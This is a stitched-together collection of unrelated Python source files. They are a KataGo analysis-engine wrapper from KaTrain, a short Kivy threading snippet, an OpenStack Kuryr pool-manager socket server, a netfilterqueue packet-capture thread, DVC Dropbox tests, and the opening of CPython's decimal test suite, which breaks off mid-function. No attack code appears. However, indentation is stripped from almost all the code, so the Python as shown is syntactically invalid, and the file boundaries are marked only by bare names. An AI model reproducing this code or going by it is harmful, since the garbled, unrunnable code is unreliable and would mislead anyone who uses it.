except (FileNotFoundError, PermissionError, OSError) as e:
self.katrain.log(
i18n._("Starting Kata failed").format(command=self.command, error=e),
OUTPUT_ERROR,
)
return # don't start
self.analysis_thread = threading.Thread(target=self._analysis_read_thread, daemon=True)
self.stderr_thread = threading.Thread(target=self._read_stderr_thread, daemon=True)
self.write_stdin_thread = threading.Thread(target=self._write_stdin_thread, daemon=True)
self.analysis_thread.start()
self.stderr_thread.start()
self.write_stdin_thread.start()
def on_new_game(self):
self.base_priority += 1
if not self.is_idle():
with self.thread_lock:
for query_id in list(self.queries.keys()):
self.terminate_query(query_id)
self.queries = {}
self.write_queue = queue.Queue()
def restart(self):
self.queries = {}
self.shutdown(finish=False)
self.start()
def check_alive(self, os_error="", exception_if_dead=False):
ok = self.katago_process and self.katago_process.poll() is None
if not ok and exception_if_dead:
if self.katago_process:
code = self.katago_process and self.katago_process.poll()
if code == 3221225781:
died_msg = i18n._("Engine missing DLL")
else:
os_error += f"status {code}"
died_msg = i18n._("Engine died unexpectedly").format(error=os_error)
if code != 1: # deliberate exit, already showed message?
self.katrain.log(died_msg, OUTPUT_ERROR)
self.katago_process = None
else:
died_msg = i18n._("Engine died unexpectedly").format(error=os_error)
raise EngineDiedException(died_msg)
return ok
def wait_to_finish(self):
while self.queries and self.katago_process and self.katago_process.poll() is None:
time.sleep(0.1)
def shutdown(self, finish=False):
process = self.katago_process
if finish and process:
self.wait_to_finish()
if process:
self.katago_process = None
self.katrain.log("Terminating KataGo process", OUTPUT_DEBUG)
process.terminate()
self.katrain.log("Terminated KataGo process", OUTPUT_DEBUG)
if finish is not None: # don't care if exiting app
for t in [self.write_stdin_thread, self.analysis_thread, self.stderr_thread]:
if t:
t.join()
def is_idle(self):
return not self.queries and self.write_queue.empty()
def queries_remaining(self):
return len(self.queries) + int(not self.write_queue.empty())
def _read_stderr_thread(self):
while self.katago_process is not None:
try:
line = self.katago_process.stderr.readline()
if line:
try:
self.katrain.log(line.decode(errors="ignore").strip(), OUTPUT_KATAGO_STDERR)
except Exception as e:
print("ERROR in processing KataGo stderr:", line, "Exception", e)
elif self.katago_process:
self.check_alive(exception_if_dead=True)
except Exception as e:
self.katrain.log(f"Exception in reading stdout {e}", OUTPUT_DEBUG)
return
def _analysis_read_thread(self):
while self.katago_process is not None:
try:
line = self.katago_process.stdout.readline().strip()
if self.katago_process and not line:
self.check_alive(exception_if_dead=True)
except OSError as e:
self.check_alive(os_error=str(e), exception_if_dead=True)
return
if b"Uncaught exception" in line:
self.katrain.log(f"KataGo Engine Failed: {line.decode(errors='ignore')}", OUTPUT_ERROR)
return
if not line:
continue
try:
analysis = json.loads(line)
if "id" not in analysis:
self.katrain.log(f"Error without ID {analysis} received from KataGo", OUTPUT_ERROR)
continue
query_id = analysis["id"]
if query_id not in self.queries:
self.katrain.log(f"Query result {query_id} discarded -- recent new game?", OUTPUT_DEBUG)
continue
callback, error_callback, start_time, next_move = self.queries[query_id]
if "error" in analysis:
del self.queries[query_id]
if error_callback:
error_callback(analysis)
elif not (next_move and "Illegal move" in analysis["error"]): # sweep
self.katrain.log(f"{analysis} received from KataGo", OUTPUT_ERROR)
elif "warning" in analysis:
self.katrain.log(f"{analysis} received from KataGo", OUTPUT_DEBUG)
elif "terminateId" in analysis:
self.katrain.log(f"{analysis} received from KataGo", OUTPUT_DEBUG)
else:
partial_result = analysis.get("isDuringSearch", False)
if not partial_result:
del self.queries[query_id]
time_taken = time.time() - start_time
results_exist = not analysis.get("noResults", False)
self.katrain.log(
f"[{time_taken:.1f}][{query_id}][{'....' if partial_result else 'done'}] KataGo analysis received: {len(analysis.get('moveInfos',[]))} candidate moves, {analysis['rootInfo']['visits'] if results_exist else 'n/a'} visits",
OUTPUT_DEBUG,
)
self.katrain.log(json_truncate_arrays(analysis), OUTPUT_EXTRA_DEBUG)
try:
if callback and results_exist:
callback(analysis, partial_result)
except Exception as e:
self.katrain.log(f"Error in engine callback for query {query_id}: {e}", OUTPUT_ERROR)
if getattr(self.katrain, "update_state", None): # easier mocking etc
self.katrain.update_state()
except Exception as e:
self.katrain.log(f"Unexpected exception {e} while processing KataGo output {line}", OUTPUT_ERROR)
traceback.print_exc()
def _write_stdin_thread(self): # flush only in a thread since it returns only when the other program reads
while self.katago_process is not None:
try:
query, callback, error_callback, next_move = self.write_queue.get(block=True, timeout=0.1)
except queue.Empty:
continue
with self.thread_lock:
if "id" not in query:
self.query_counter += 1
query["id"] = f"QUERY:{str(self.query_counter)}"
self.queries[query["id"]] = (callback, error_callback, time.time(), next_move)
self.katrain.log(f"Sending query {query['id']}: {json.dumps(query)}", OUTPUT_DEBUG)
try:
self.katago_process.stdin.write((json.dumps(query) + "\n").encode())
self.katago_process.stdin.flush()
except OSError as e:
self.check_alive(os_error=str(e), exception_if_dead=False)
def send_query(self, query, callback, error_callback, next_move=None):
self.write_queue.put((query, callback, error_callback, next_move))
def terminate_query(self, query_id):
if query_id is not None:
self.send_query({"action": "terminate", "terminateId": query_id}, None, None)
def request_analysis(
self,
analysis_node: GameNode,
callback: Callable,
error_callback: Optional[Callable] = None,
visits: int = None,
analyze_fast: bool = False,
time_limit=True,
find_alternatives: bool = False,
region_of_interest: Optional[List] = None,
priority: int = 0,
ownership: Optional[bool] = None,
next_move: Optional[GameNode] = None,
extra_settings: Optional[Dict] = None,
report_every: Optional[float] = None,
):
nodes = analysis_node.nodes_from_root
moves = [m for node in nodes for m in node.moves]
initial_stones = [m for node in nodes for m in node.placements]
if next_move:
moves.append(next_move)
if ownership is None:
ownership = self.config["_enable_ownership"] and not next_move
if visits is None:
visits = self.config["max_visits"]
if analyze_fast and self.config.get("fast_visits"):
visits = self.config["fast_visits"]
size_x, size_y = analysis_node.board_size
if find_alternatives:
avoid = [
{
"moves": list(analysis_node.analysis["moves"].keys()),
"player": analysis_node.next_player,
"untilDepth": 1,
}
]
elif region_of_interest:
xmin, xmax, ymin, ymax = region_of_interest
avoid = [
{
"moves": [
Move((x, y)).gtp()
for x in range(0, size_x)
for y in range(0, size_y)
if x < xmin or x > xmax or y < ymin or y > ymax
],
"player": player,
"untilDepth": 1, # tried a large number here, or 2, but this seems more natural
}
for player in "BW"
]
else:
avoid = []
settings = copy.copy(self.override_settings)
if time_limit:
settings["maxTime"] = self.config["max_time"]
if self.config.get("wide_root_noise", 0.0) > 0.0: # don't send if 0.0, so older versions don't error
settings["wideRootNoise"] = self.config["wide_root_noise"]
query = {
"rules": self.get_rules(analysis_node),
"priority": self.base_priority + priority,
"analyzeTurns": [len(moves)],
"maxVisits": visits,
"komi": analysis_node.komi,
"boardXSize": size_x,
"boardYSize": size_y,
"includeOwnership": ownership and not next_move,
"includeMovesOwnership": ownership and not next_move,
"includePolicy": not next_move,
"initialStones": [[m.player, m.gtp()] for m in initial_stones],
"initialPlayer": analysis_node.initial_player,
"moves": [[m.player, m.gtp()] for m in moves],
"overrideSettings": {**settings, **(extra_settings or {})},
}
if report_every is not None:
query["reportDuringSearchEvery"] = report_every
if avoid:
query["avoidMoves"] = avoid
self.send_query(query, callback, error_callback, next_move)
analysis_node.analysis_visits_requested = max(analysis_node.analysis_visits_requested, visits)
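# Illustrative query shape (the values below are made up; the keys mirror the dict built in
# request_analysis above). _write_stdin_thread adds the "id" field and writes the query as a
# single JSON line on KataGo's stdin; "reportDuringSearchEvery" and "avoidMoves" are only
# included when requested.
_EXAMPLE_ANALYSIS_QUERY = {
    "id": "QUERY:1",
    "rules": "japanese",
    "priority": 0,
    "analyzeTurns": [2],
    "maxVisits": 500,
    "komi": 6.5,
    "boardXSize": 19,
    "boardYSize": 19,
    "includeOwnership": True,
    "includeMovesOwnership": True,
    "includePolicy": True,
    "initialStones": [],
    "initialPlayer": "B",
    "moves": [["B", "Q16"], ["W", "D4"]],
    "overrideSettings": {"reportAnalysisWinratesAs": "BLACK"},
}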
|
_send.py
|
import threading
def send(self):
    # Kivy must stay on the main thread, otherwise Kivy pauses
self.check_if_all()
self.start_gif()
self.download_thread = threading.Thread(target=self.download)
self.check_thread = threading.Thread(target=self.check_if_done)
self.download_thread.start()
self.check_thread.start()
|
pool.py
|
# Copyright 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from http import server
import os
import socketserver
import threading
from openstack import exceptions as os_exc
from oslo_config import cfg as oslo_cfg
from oslo_log import log as logging
from oslo_serialization import jsonutils
from kuryr.lib._i18n import _
from kuryr_kubernetes import constants
from kuryr_kubernetes.controller.drivers import base as drivers
LOG = logging.getLogger(__name__)
pool_manager_opts = [
oslo_cfg.StrOpt('sock_file',
help=_("Absolute path to socket file that "
"will be used for communication with "
"the Pool Manager daemon"),
default='/run/kuryr/kuryr_manage.sock'),
]
oslo_cfg.CONF.register_opts(pool_manager_opts, "pool_manager")
class UnixDomainHttpServer(socketserver.ThreadingUnixStreamServer):
pass
class RequestHandler(server.BaseHTTPRequestHandler):
protocol = "HTTP/1.0"
def do_POST(self):
content_length = int(self.headers.get('Content-Length', 0))
body = self.rfile.read(content_length)
params = dict(jsonutils.loads(body))
if self.path.endswith(constants.VIF_POOL_POPULATE):
trunk_ips = params.get('trunks', None)
num_ports = params.get('num_ports', 1)
if trunk_ips:
try:
self._create_subports(num_ports, trunk_ips)
except Exception:
response = ('Error while populating pool {0} with {1} '
'ports.'.format(trunk_ips, num_ports))
else:
response = ('Ports pool at {0} was populated with {1} '
'ports.'.format(trunk_ips, num_ports))
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
else:
response = 'Trunk port IP(s) missing.'
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
elif self.path.endswith(constants.VIF_POOL_FREE):
trunk_ips = params.get('trunks', None)
if not trunk_ips:
pool = "all"
else:
pool = trunk_ips
try:
self._delete_subports(trunk_ips)
except Exception:
response = 'Error freeing ports pool: {0}.'.format(pool)
else:
response = 'Ports pool belonging to {0} was freed.'.format(
pool)
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
else:
response = 'Method not allowed.'
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
def do_GET(self):
content_length = int(self.headers.get('Content-Length', 0))
body = self.rfile.read(content_length)
params = dict(jsonutils.loads(body))
if self.path.endswith(constants.VIF_POOL_LIST):
try:
pools_info = self._list_pools()
except Exception:
response = 'Error listing the pools.'
else:
response = 'Pools:\n{0}'.format(pools_info)
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
elif self.path.endswith(constants.VIF_POOL_SHOW):
raw_key = params.get('pool_key', None)
if len(raw_key) != 3:
response = ('Invalid pool key. Proper format is:\n'
'[trunk_ip, project_id, [security_groups]]\n')
else:
pool_key = (raw_key[0], raw_key[1], tuple(sorted(raw_key[2])))
try:
pool_info = self._show_pool(pool_key)
except Exception:
response = 'Error showing pool: {0}.'.format(pool_key)
else:
response = 'Pool {0} ports are:\n{1}'.format(pool_key,
pool_info)
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
else:
response = 'Method not allowed.'
self.send_header('Content-Length', len(response))
self.end_headers()
self.wfile.write(response.encode())
def _create_subports(self, num_ports, trunk_ips):
try:
drv_project = drivers.PodProjectDriver.get_instance()
drv_subnets = drivers.PodSubnetsDriver.get_instance()
drv_sg = drivers.PodSecurityGroupsDriver.get_instance()
drv_vif = drivers.PodVIFDriver.get_instance()
drv_vif_pool = drivers.VIFPoolDriver.get_instance()
drv_vif_pool.set_vif_driver(drv_vif)
project_id = drv_project.get_project({})
security_groups = drv_sg.get_security_groups({}, project_id)
subnets = drv_subnets.get_subnets([], project_id)
except TypeError:
LOG.error("Invalid driver type")
raise
for trunk_ip in trunk_ips:
try:
drv_vif_pool.force_populate_pool(
trunk_ip, project_id, subnets, security_groups, num_ports)
except os_exc.ConflictException:
LOG.error("VLAN Id conflict (already in use) at trunk %s",
trunk_ip)
raise
except os_exc.SDKException:
LOG.exception("Error happened during subports addition at "
"trunk: %s", trunk_ip)
raise
def _delete_subports(self, trunk_ips):
try:
drv_vif = drivers.PodVIFDriver.get_instance()
drv_vif_pool = drivers.VIFPoolDriver.get_instance()
drv_vif_pool.set_vif_driver(drv_vif)
drv_vif_pool.free_pool(trunk_ips)
except TypeError:
LOG.error("Invalid driver type")
raise
def _list_pools(self):
try:
drv_vif = drivers.PodVIFDriver.get_instance()
drv_vif_pool = drivers.VIFPoolDriver.get_instance()
drv_vif_pool.set_vif_driver(drv_vif)
available_pools = drv_vif_pool.list_pools()
except TypeError:
LOG.error("Invalid driver type")
raise
pools_info = ""
for pool_key, pool_items in available_pools.items():
pools_info += (jsonutils.dumps(pool_key) + " has "
+ str(len(pool_items)) + " ports\n")
if pools_info:
return pools_info
return "There are no pools"
def _show_pool(self, pool_key):
try:
drv_vif = drivers.PodVIFDriver.get_instance()
drv_vif_pool = drivers.VIFPoolDriver.get_instance()
drv_vif_pool.set_vif_driver(drv_vif)
pool = drv_vif_pool.show_pool(pool_key)
except TypeError:
LOG.error("Invalid driver type")
raise
if pool:
pool_info = ""
for pool_id in pool:
pool_info += str(pool_id) + "\n"
return pool_info
else:
return "Empty pool"
class PoolManager(object):
"""Manages the ports pool enabling population and free actions.
    `PoolManager` runs on the Kuryr-kubernetes controller and allows populating
    specific pools with a given amount of ports. In addition, it also allows
    removing all the (unused) ports in the given pool(s), or in all of the
    pools if none is specified.
"""
def __init__(self):
pool_manager = threading.Thread(target=self._start_kuryr_manage_daemon)
pool_manager.setDaemon(True)
pool_manager.start()
def _start_kuryr_manage_daemon(self):
LOG.info("Pool manager started")
server_address = oslo_cfg.CONF.pool_manager.sock_file
try:
os.unlink(server_address)
except OSError:
if os.path.exists(server_address):
raise
try:
httpd = UnixDomainHttpServer(server_address, RequestHandler)
httpd.serve_forever()
except KeyboardInterrupt:
pass
except Exception:
LOG.exception('Failed to start Pool Manager.')
httpd.socket.close()
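# Illustrative client sketch for the Unix-socket server above (a minimal example; this helper
# and the trunk IP are invented for the illustration). It issues the kind of POST request that
# RequestHandler.do_POST expects for pool population: a JSON body with 'trunks' and 'num_ports',
# sent to the path constants.VIF_POOL_POPULATE on the configured socket file.
def _example_populate_pool_request(trunk_ip='10.0.0.6', num_ports=3):
    import socket
    body = jsonutils.dumps({'trunks': [trunk_ip], 'num_ports': num_ports})
    request = ('POST {path} HTTP/1.0\r\n'
               'Content-Length: {length}\r\n'
               '\r\n'
               '{body}').format(path=constants.VIF_POOL_POPULATE,
                                length=len(body), body=body)
    client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        client.connect(oslo_cfg.CONF.pool_manager.sock_file)
        client.sendall(request.encode())
        return client.recv(4096).decode()  # first chunk of the handler's raw response
    finally:
        client.close()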
|
packet_capture.py
|
"""
Thread that continuously captures and processes packets.
"""
import scapy.all as sc
import threading
import time
from host_state import HostState
import utils
from netfilterqueue import NetfilterQueue
class PacketCapture(object):
def __init__(self, host_state):
assert isinstance(host_state, HostState)
self._host_state = host_state
self.nfqueue = NetfilterQueue()
self._lock = threading.Lock()
self._active = True
self._thread = threading.Thread(target=self._capture_packets)
self._thread.daemon = True
def start(self):
with self._lock:
self._active = True
utils.log('[Packet Capture] Starting.')
self._thread.start()
def _capture_packets(self):
while self._is_active():
if not self._host_state.is_inspecting():
time.sleep(2)
continue
# result = utils.safe_run(sc.sniff, kwargs={
# 'prn': self._host_state.packet_processor.process_packet,
# 'iface': 'wlan0',
# 'stop_filter':
# lambda _:
# not self._is_active() or
# not self._host_state.is_inspecting(),
# 'timeout': 30
# })
self.nfqueue.bind(1, self._host_state.packet_processor.process_packet)
print('run nfqueue')
result = utils.safe_run(self.nfqueue.run)
if isinstance(result, utils._SafeRunError):
time.sleep(1)
def _is_active(self):
with self._lock:
return self._active
def stop(self):
self.nfqueue.unbind()
utils.log('[Packet Capture] Stopping.')
with self._lock:
self._active = False
self._thread.join()
utils.log('[Packet Capture] Stopped.')
|
test_dropbox.py
|
import multiprocessing
import random
import string
import uuid
import pytest
from dvc.exceptions import DvcException
from dvc.path_info import PathInfo
from dvc.tree.dropbox import DropboxTree
def rand_content(nchar):
letters = string.ascii_lowercase
prefix = "".join(random.choice(letters) for _ in range(100))
return prefix + "a" * (nchar - 100)
SCENARIOS = [
# (n_files, filesize)
(100, 100 * 1024),
# 200 MB is over their limit for single-call upload
(5, 200 * 1024 * 1024),
]
IDS = [
"small_files",
"normal_files",
]
def push(dvc):
dvc.push()
class TestRemoteDropbox:
CONFIG = {
"url": "dropbox://dvc/tests-root",
"chunk_size": 48,
}
INVALID_CHUNK_SIZE_CONFIG_MULTIPLE = {
"url": "dropbox://dvc/tests-root",
"chunk_size": 47,
}
INVALID_CHUNK_SIZE_CONFIG_LESS_THAN_4 = {
"url": "dropbox://dvc/tests-root",
"chunk_size": 0,
}
INVALID_CHUNK_SIZE_CONFIG_OVER_150 = {
"url": "dropbox://dvc/tests-root",
"chunk_size": 300,
}
def test_init(self, dvc, dropbox):
tree = DropboxTree(dvc, self.CONFIG)
assert str(tree.path_info) == self.CONFIG["url"]
assert tree.chunk_size_mb == self.CONFIG["chunk_size"]
with pytest.raises(DvcException):
DropboxTree(dvc, self.INVALID_CHUNK_SIZE_CONFIG_MULTIPLE)
with pytest.raises(DvcException):
DropboxTree(dvc, self.INVALID_CHUNK_SIZE_CONFIG_LESS_THAN_4)
with pytest.raises(DvcException):
DropboxTree(dvc, self.INVALID_CHUNK_SIZE_CONFIG_OVER_150)
def test_dropbox(self, dvc, tmp_dir, dropbox):
tree = DropboxTree(dvc, dropbox.config)
tmp_dir.gen("small", "small")
to_info = tree.path_info / "small"
tree.upload(PathInfo("small"), to_info)
assert tree.exists(to_info)
hash_info = tree.get_file_hash(to_info)
assert hash_info.name == "content_hash"
hash_ = hash_info.value
assert hash_
assert isinstance(hash_, str)
assert hash_.strip("'").strip('"') == hash_
to_other_info = tree.path_info / "foo" / "bar"
tree.upload(PathInfo("small"), to_other_info)
files = list(tree.walk_files(tree.path_info))
assert len(files) == 2
assert str(tree.path_info) + "/small" in files
assert str(tree.path_info) + "/foo/bar" in files
tree.remove(to_info)
assert not tree.exists(to_info)
tmp_dir.gen("large", "large" * 1_000_000)
tree.upload(PathInfo("large"), tree.path_info / "large")
assert tree.exists(tree.path_info / "large")
tree.remove(tree.path_info)
@pytest.mark.skip(reason="For manual testing only")
@pytest.mark.parametrize("n_files, size", SCENARIOS, ids=IDS)
def test_dropbox_files_upload(self, n_files, size, dvc, tmp_dir, dropbox):
random.seed(42)
tmp_dir.dvc_gen(
{
str(uuid.uuid4()): {
"file_{0}".format(i): rand_content(size)
for i in range(n_files)
}
}
)
tmp_dir.add_remote(config=dropbox.config)
dvc.push()
tree = DropboxTree(dvc, dropbox.config)
tree.remove(tree.path_info)
@pytest.mark.skip(reason="For manual testing only")
@pytest.mark.parametrize("n_files, size", SCENARIOS, ids=IDS)
def test_dropbox_recovers_from_failure(
self, n_files, size, dvc, tmp_dir, scm, dropbox
):
random.seed(42)
tmp_dir.dvc_gen(
{
str(uuid.uuid4()): {
"file_{0}".format(i): rand_content(size)
for i in range(n_files)
}
}
)
tmp_dir.add_remote(config=dropbox.config)
p = multiprocessing.Process(target=push, args=(dvc,))
p.start()
p.join(10) # Let's say we can't upload whole content in 10 secs.
if p.is_alive():
p.terminate()
p.join()
dvc.push()
tree = DropboxTree(dvc, dropbox.config)
tree.remove(tree.path_info)
|
test_decimal.py
|
# Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings)
from test.support import (check_warnings, import_fresh_module, TestFailed,
run_with_locale, cpython_only)
import random
import time
import inspect
try:
import threading
except ImportError:
threading = None
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
if not m: return
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
if self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return True/False rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
return self.readcontext.create_decimal(v)
else:
return self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
if skip_expected:
raise unittest.SkipTest
with open(file) as f:
for line in f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except self.decimal.DecimalException as exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = (x.strip().lower() for x in s.split(':'))
if funct == 'rounding':
value = self.RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, (lambda *args: None))
funct(value)
def eval_equation(self, s):
if not TEST_ALL and random.random() < 0.90:
return
self.context.clear_flags()
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
if id in self.skipped_test_ids:
return
fname = self.NameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]
for exception in Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
